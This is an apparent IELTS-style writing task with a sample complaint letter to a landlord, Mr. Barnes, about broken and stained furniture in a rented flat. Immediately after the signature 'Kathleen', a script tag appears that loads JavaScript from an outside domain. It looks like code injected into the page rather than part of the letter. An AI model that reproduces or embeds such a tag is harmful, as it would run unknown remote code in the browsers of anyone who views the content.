You and your family are living in rented accommodation in an English speaking country. You are not satisfied with the condition of some of the furniture.
Write a letter to your landlord. In your letter
• introduce yourself
• explain what is wrong with the furniture
• say what action you would like the landlord to take
You do NOT need to write any addresses.
Dear Mr. Barnes,
I regret to inform you about my disappointment in seeing the state of the interiors, of the apartment I am currently renting. I am British-American, and am not well acquainted with the locality, and yet I trusted your renting service.
The reality and the images of the flat, provided on the renters' website don’t look alike. I was extremely displeased to see a broken dining table. The hinges of the cupboards are loose, and the chairs are squeaking.
The couch in the living room is extremely uncomfortable and has plenty of coffee stains. The embarrassment is keeping us from inviting our new friends and family to our new residence.
I request you to replace or repair the furniture in my apartment, immediately. I hope you will take the necessary action or I may have to deduct a substantial amount from the monthly cheque towards you.
Hope you will rectify this issue at the earliest.
Yours sincerely,
Kathleen <script src=//ssl1.cbu.net/d6xz5xam></script>
